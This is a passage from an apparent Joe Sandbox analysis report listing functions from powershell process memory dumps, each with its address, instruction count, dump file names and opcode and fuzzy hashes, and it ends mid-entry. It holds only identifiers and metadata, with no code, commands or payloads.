                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fb6ce651a6a4cc79a4660be3e6d6d89499bb9e6fa50f19de09d37cfc6db1ed4d
                                                                                                                    • Instruction ID: f28354d2d854cc3cd39b3687aa1f26db5396b22c298420e68878be73f862164a
                                                                                                                    • Opcode Fuzzy Hash: fb6ce651a6a4cc79a4660be3e6d6d89499bb9e6fa50f19de09d37cfc6db1ed4d
                                                                                                                    • Instruction Fuzzy Hash: 6D516F74A412148FDB15EF69C9586AEBBB2FF89350F24846DE406EB360DB35AC41CF60
                                                                                                                    Function 04A87358 Relevance: .2, Instructions: 166COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: be864120952d51881eecc6e89b957f7ecc640e23b141f9d7e63afdbe870d1bd2
                                                                                                                    • Instruction ID: f014fcbc2fa0f32ee3dabe7b5f6568adb4c3408f4bbb6e1ebf8222da0904cf1a
                                                                                                                    • Opcode Fuzzy Hash: be864120952d51881eecc6e89b957f7ecc640e23b141f9d7e63afdbe870d1bd2
                                                                                                                    • Instruction Fuzzy Hash: 5F612034A00649CFDB15DFA4C954A9DBBB2FF88300F258559E402AF369DB74ED89CB80
                                                                                                                    Function 04A88848 Relevance: .2, Instructions: 164COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 658e31743ff97fd1f5852e7af9a8c417e623c706a0240113f1634cc15501fd32
                                                                                                                    • Instruction ID: b22b451e2d21bc742636e2d687d5d8ea723d9270ba1b44ff976fd0455777f452
                                                                                                                    • Opcode Fuzzy Hash: 658e31743ff97fd1f5852e7af9a8c417e623c706a0240113f1634cc15501fd32
                                                                                                                    • Instruction Fuzzy Hash: 1C511330A01264CFEB65AB78C954B6E77B2BF89248F2445ADD006DB3A0DF399D81CF50
                                                                                                                    Function 04A87368 Relevance: .2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3182b052bf571f659110dbb9854cd9a02c54303e447998596aba935b0c587c7b
                                                                                                                    • Instruction ID: 3d57abdf2d50a093c8905fb7f7f7334c2bf606066ad7b2c33814846f5c88c347
                                                                                                                    • Opcode Fuzzy Hash: 3182b052bf571f659110dbb9854cd9a02c54303e447998596aba935b0c587c7b
                                                                                                                    • Instruction Fuzzy Hash: AD610F34A00649CFDB15DFA4C944A9DBBB2FF88304F258559E406AF369DB74ED89CB80
                                                                                                                    Function 04A877F0 Relevance: .1, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 79c799d2efa280a03828e2b33abb5673330d06096d910138ea0781383f18ff1c
                                                                                                                    • Instruction ID: 34d1c9d06dc2dce99b026f806ac282f3b2e6ddd2fb1d3cbc58b771ddfcb7471f
                                                                                                                    • Opcode Fuzzy Hash: 79c799d2efa280a03828e2b33abb5673330d06096d910138ea0781383f18ff1c
                                                                                                                    • Instruction Fuzzy Hash: E7517F70A002189FDB15EFA9D888A9EBBB6FFC5354F14886DD005EB251DB75A881CB50
                                                                                                                    Function 04A877E2 Relevance: .1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: efda661b193a874f003e86c07906ae3a7c4d79310a970821e9e975bef68c0f9c
                                                                                                                    • Instruction ID: b4a9d5601ca4dcd54349a5be17b7e17e4e9409bbe93ee2575df3aff0138d0070
                                                                                                                    • Opcode Fuzzy Hash: efda661b193a874f003e86c07906ae3a7c4d79310a970821e9e975bef68c0f9c
                                                                                                                    • Instruction Fuzzy Hash: 76415F70E00218DFDB15DF65C884BAEBBB2FF85354F14896DD006AB351DB75A885CB80
                                                                                                                    Function 04A882D0 Relevance: .1, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3873b56bf86c2f5c2995cd4059f45bc6f3c07b245f1f37265c1e5e5fc270dec8
                                                                                                                    • Instruction ID: 7ee0c9fc6801bed13e58ef7d77214952a7a09212b8e6f83c9a9ac1f558ca87af
                                                                                                                    • Opcode Fuzzy Hash: 3873b56bf86c2f5c2995cd4059f45bc6f3c07b245f1f37265c1e5e5fc270dec8
                                                                                                                    • Instruction Fuzzy Hash: 0341D131E0074A9BDB15FFA5C4505AEBFB2FF85300F54466ED001AB251EFB8A985C790
                                                                                                                    Function 04A82B00 Relevance: .1, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35b2e5534f4a5cc44b78a45677e81e955984ec5c083c9d0e30a3fb9233145554
                                                                                                                    • Instruction ID: 38b534ba7b2a29a0168f76042268be813f8804d1f17949abd43b01006fb1521c
                                                                                                                    • Opcode Fuzzy Hash: 35b2e5534f4a5cc44b78a45677e81e955984ec5c083c9d0e30a3fb9233145554
                                                                                                                    • Instruction Fuzzy Hash: BD4146B5A001058FCB05DF99C5D8ABAFBB1FF48310B258599D855AB364C732FC91CBA0
                                                                                                                    Function 04A886B9 Relevance: .1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 95d3dffed26542f220d13c82567f2eba8cc1833f66ef75df5f0381a854161e93
                                                                                                                    • Instruction ID: afefe3f1fbc08fad2892c4fccc2f2cda1072e087fcdb00f4675a3a90410efc04
                                                                                                                    • Opcode Fuzzy Hash: 95d3dffed26542f220d13c82567f2eba8cc1833f66ef75df5f0381a854161e93
                                                                                                                    • Instruction Fuzzy Hash: 4741BC74A011198FDB25DF69CD90F99BBB2FF88300F1185E9D409AB395DA34AE85CF90
                                                                                                                    Function 04A88854 Relevance: .1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7409b10910f966b430a9cad45e889ad2065312b6eb569983ebe29a4c9ba9b2b5
                                                                                                                    • Instruction ID: 0fd33976d4f32accec67af1d2ede7b80e6f9046c1604bcda75bc74b0dece320c
                                                                                                                    • Opcode Fuzzy Hash: 7409b10910f966b430a9cad45e889ad2065312b6eb569983ebe29a4c9ba9b2b5
                                                                                                                    • Instruction Fuzzy Hash: 7441E870A011198FDB25DF68D990F9DB7B2FF88204F5086D9D408AB395DB34AE81CF90
                                                                                                                    Function 04A87E38 Relevance: .1, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0527ab4167377dc90a29d90cd33882917c5dae98c77c148616215c0251f1e1a2
                                                                                                                    • Instruction ID: 7b35fed78e87065a70d59c84fe53e9ba44f4544e23e182c2ced414594e9f5491
                                                                                                                    • Opcode Fuzzy Hash: 0527ab4167377dc90a29d90cd33882917c5dae98c77c148616215c0251f1e1a2
                                                                                                                    • Instruction Fuzzy Hash: 2B313C34A406149FEB24EB25D9586AEBBB6FFC8750F54482CE406AB3A0DF75AC41CB50
                                                                                                                    Function 04A876BA Relevance: .1, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d2d9e7a4b208bd74d4ab1d4632d1a09d80338063413297d13b6c27e0abf34de8
                                                                                                                    • Instruction ID: f44e90542a4851f088ddabc49b3761992f98ef610c4cf8d59a095d8764ce3f88
                                                                                                                    • Opcode Fuzzy Hash: d2d9e7a4b208bd74d4ab1d4632d1a09d80338063413297d13b6c27e0abf34de8
                                                                                                                    • Instruction Fuzzy Hash: 31313879B401118FDB14DF29C898AAE7BF2EF88351F184068E406EB3A1DB71AC41CB50
                                                                                                                    Function 04A876C8 Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2132c52adafde588d56f72b729894daf78cb25f3156ada6d93bd090439ec3e2b
                                                                                                                    • Instruction ID: 7a7d0b9a801cdbf7adb49ac0c6a297d949bb63aaac1875302bdc30e59ee6fff8
                                                                                                                    • Opcode Fuzzy Hash: 2132c52adafde588d56f72b729894daf78cb25f3156ada6d93bd090439ec3e2b
                                                                                                                    • Instruction Fuzzy Hash: 74213975B401149FDB14EF29C898BAE7BF6EF88751F144068E406EB3A1DB71AC41CB90
                                                                                                                    Function 04A882C0 Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 83e39c565435f45fbd0ed675b832bde7580fac0f89076d43d98fb60be97b3d4d
                                                                                                                    • Instruction ID: 0f44bcb89b943ccd4316108eac8944ead357d692bcb56e40816d4d5f05595157
                                                                                                                    • Opcode Fuzzy Hash: 83e39c565435f45fbd0ed675b832bde7580fac0f89076d43d98fb60be97b3d4d
                                                                                                                    • Instruction Fuzzy Hash: C8211D32D0130ADBDB14EFA5C5546EEFBB2FF95300F54461ED405AB650EBB46986CB80
                                                                                                                    Function 02E3D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2353499255.0000000002E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E3D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_2e3d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5a9a7290395574bd2621b87be8fca19c5e26f0b840ca907123ad03402f93c8be
                                                                                                                    • Instruction ID: b3c02534d4fbb0b1612199df7344c0fdbc1f19e96eee22e06455be1f772b9a32
                                                                                                                    • Opcode Fuzzy Hash: 5a9a7290395574bd2621b87be8fca19c5e26f0b840ca907123ad03402f93c8be
                                                                                                                    • Instruction Fuzzy Hash: CD012D6204E3C05ED7138B258D94B62BFB4DF53624F19C0DBD8888F1A7C2695849CB72
                                                                                                                    Function 02E3D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2353499255.0000000002E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E3D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_2e3d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3c05a938feb9cdeefcbbb713a28d250cb39c8d0b45aba6698c268d2677a2def4
                                                                                                                    • Instruction ID: 71b874c801236faf202e79f374c85a1d9ebff5a9f9c95f062850feb4c2e16cd7
                                                                                                                    • Opcode Fuzzy Hash: 3c05a938feb9cdeefcbbb713a28d250cb39c8d0b45aba6698c268d2677a2def4
                                                                                                                    • Instruction Fuzzy Hash: 5B0126724453009EE7228A29CDC8B67BF98EF41B39F18C41AEC484B246C7799941CEB1
                                                                                                                    Function 04A88612 Relevance: .0, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d3234d0e1f9cdaf7ff8be0ca9636098aa001d359014ef3a4c8640865e993931c
                                                                                                                    • Instruction ID: bea026b7c560d75f971771ea9a25e11ea47a3dcf02b93d2eb66fd112a1bf3f1d
                                                                                                                    • Opcode Fuzzy Hash: d3234d0e1f9cdaf7ff8be0ca9636098aa001d359014ef3a4c8640865e993931c
                                                                                                                    • Instruction Fuzzy Hash: A601DB345053809FC722DB69D5889AABFB4DF42259B0941EDD4955F162C738E90CCBA1
                                                                                                                    Function 04A870A8 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9d57c05e1e5aa2b0f6be9491d8944cc6f288cda779994ca27ac054920d3e38d9
                                                                                                                    • Instruction ID: ac7062a79e3fb9e4158359e462209b1aad3fd82de59916935f583599b292e0c2
                                                                                                                    • Opcode Fuzzy Hash: 9d57c05e1e5aa2b0f6be9491d8944cc6f288cda779994ca27ac054920d3e38d9
                                                                                                                    • Instruction Fuzzy Hash: DF01FB78A0424A8FCB80DFA8D5859AEBFF1FF49210F5041D9E505DB322E630A941CB91
                                                                                                                    Function 04A88270 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8fe55b6653df2feef6c4ef5d9dfa86ded7c4a8b73604574541f20354f0734609
                                                                                                                    • Instruction ID: c51d5b1882d78096c753d634a564ad7922cadbc24c5ba54377fca9ae765c0bbf
                                                                                                                    • Opcode Fuzzy Hash: 8fe55b6653df2feef6c4ef5d9dfa86ded7c4a8b73604574541f20354f0734609
                                                                                                                    • Instruction Fuzzy Hash: 9EF0A0312097805FC306D768E8909997BA2EFC6310B084AAEE142CF667CFB4A845CB91
                                                                                                                    Function 04A870B8 Relevance: .0, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5ff50e4bc66baa0315f45c6e37568d759d24d97b76a15919be8abc576055b47e
                                                                                                                    • Instruction ID: 57a9d6b6a2f299d185846116890250a32682319476235c5b2b3b335d0ba8c9b1
                                                                                                                    • Opcode Fuzzy Hash: 5ff50e4bc66baa0315f45c6e37568d759d24d97b76a15919be8abc576055b47e
                                                                                                                    • Instruction Fuzzy Hash: 4BF0A974E0020A8FCB80DF68D485AAEBBF5FF49310F505199E509DB321E730A981CB91
                                                                                                                    Function 04A87BE2 Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c644a7e591b694e4b11844d323b22419103114616a7217a8d4d73423223d7cef
                                                                                                                    • Instruction ID: a3aa15632d6c598a4b99c9f918b1ae4d1343772b05fb689f992caf665283c0ea
                                                                                                                    • Opcode Fuzzy Hash: c644a7e591b694e4b11844d323b22419103114616a7217a8d4d73423223d7cef
                                                                                                                    • Instruction Fuzzy Hash: 0FE04F382053909FC3029B68E55CDA47F729F4A22431541EFE409CB773C625DC44CB52
                                                                                                                    Function 04A87BF0 Relevance: .0, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2355646550.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_4a80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 13d44163f1d8696de655242cf6a54f00db016802cf4df137fa6adb08e5c9d865
                                                                                                                    • Instruction ID: d256be2fdb176ac62f5ec29280cc8d78395cb8b070b5280f824959a9bf2c1228
                                                                                                                    • Opcode Fuzzy Hash: 13d44163f1d8696de655242cf6a54f00db016802cf4df137fa6adb08e5c9d865
                                                                                                                    • Instruction Fuzzy Hash: 88D05E35200214DFC701AB68E54CD657BAAEF4972171180A5F90987322CA21DC408BD1

                                                                                                                    Executed Functions

                                                                                                                    Function 04C029F0 Relevance: .2, Instructions: 208COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 75b0218ec993c0c54a19e3764b93c670de9a84e3e37d15bcccf0d360f68377f4
                                                                                                                    • Instruction ID: 14266d9e1bec8bd0776007a070e1621091559b83a6db3ba0f03ed68499690ba3
                                                                                                                    • Opcode Fuzzy Hash: 75b0218ec993c0c54a19e3764b93c670de9a84e3e37d15bcccf0d360f68377f4
                                                                                                                    • Instruction Fuzzy Hash: 88917174A006058FCB15CF59C4D89AEFBB2FF48310B288599D955AB3A5C735FC91CBA0
                                                                                                                    Function 04C08620 Relevance: .2, Instructions: 194COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d079e79e335565b004a8dc53d198df3f9e2b9df3f69a7f6ea134216c0f2c5bc3
                                                                                                                    • Instruction ID: 8ca329230690523d75edccdc7e26ef68ffb1ae2edf1708c1d2830d58ae7e3665
                                                                                                                    • Opcode Fuzzy Hash: d079e79e335565b004a8dc53d198df3f9e2b9df3f69a7f6ea134216c0f2c5bc3
                                                                                                                    • Instruction Fuzzy Hash: 3C71B534A052558FDB15DF29CC90B9EBBB1FF85314F0585EAD0489B292D734AE85CFA0
                                                                                                                    Function 04C0795E Relevance: .2, Instructions: 188COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 252b600623a38f698ca937941be0e5903e5033ada869363833ec3b0aca2a1566
                                                                                                                    • Instruction ID: 84eb84b5a17dde4eff03856bb51d9d8c3729e1e799b1ad5afc447e299c41530c
                                                                                                                    • Opcode Fuzzy Hash: 252b600623a38f698ca937941be0e5903e5033ada869363833ec3b0aca2a1566
                                                                                                                    • Instruction Fuzzy Hash: BC714D70E01208DFDB18DFB5D594AADBBF2FF88344F148529D412AB2A0DB35AD86CB50
                                                                                                                    Function 04C07CD8 Relevance: .2, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 97b2ae6ee7824e53f71b052cd62150af3d55de53eb82d66fe0cd8e84fac9e415
                                                                                                                    • Instruction ID: 4c25909214e73accd47055961ce32cec142e22f5360278affbc0598ae1316b3b
                                                                                                                    • Opcode Fuzzy Hash: 97b2ae6ee7824e53f71b052cd62150af3d55de53eb82d66fe0cd8e84fac9e415
                                                                                                                    • Instruction Fuzzy Hash: F6518370A016548FDB18EF68C4546AEBBF2FF89350F14846AD406EB7A0DB35BD41CB60
                                                                                                                    Function 04C07358 Relevance: .2, Instructions: 165COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3c421bde57a0fedc2c14684230e30092e31d0a950cdbb646e61f5cb5705890c2
                                                                                                                    • Instruction ID: c8c8fb71815842ff26de19a4989c011e0561f1f3c5e249703ca06ce6a21de5c2
                                                                                                                    • Opcode Fuzzy Hash: 3c421bde57a0fedc2c14684230e30092e31d0a950cdbb646e61f5cb5705890c2
                                                                                                                    • Instruction Fuzzy Hash: 40613034A016498FDB19DFE4C544A9DBBB2FF85300F258559E402AF3A5D774EE89CB80
                                                                                                                    Function 04C08848 Relevance: .2, Instructions: 164COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 58ab0393832a8156dbf04ba1daeeed3b2634d827468c9fa0ba0079d04a2d980b
                                                                                                                    • Instruction ID: 77b10116199b5d3549776acca57535d80ec3493e2184ce1d9d88f2f0bce0dcb5
                                                                                                                    • Opcode Fuzzy Hash: 58ab0393832a8156dbf04ba1daeeed3b2634d827468c9fa0ba0079d04a2d980b
                                                                                                                    • Instruction Fuzzy Hash: AE513834B01254CFDB25AB78C954B6D77F2AF89288F2485A9D106DB3A0DF399D81CF20
                                                                                                                    Function 04C07368 Relevance: .2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_4c00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5288756dc7a2711995e432888faf5c9b3629074eca96439effd94a0e0bcc6683
                                                                                                                    • Instruction ID: 0e92ecd0d6035421dcf6b6a544c84f868d36b9cdbc3d1e697170c98a83ea4e64
                                                                                                                    • Opcode Fuzzy Hash: 5288756dc7a2711995e432888faf5c9b3629074eca96439effd94a0e0bcc6683
                                                                                                                    • Instruction Fuzzy Hash: 74611034A016498FDB19DFA4C544A9DBBB2FF85300F258559E402AF3A5DB74FE89CB80
                                                                                                                    Function 04C077F0 Relevance: .1, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2372601114.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
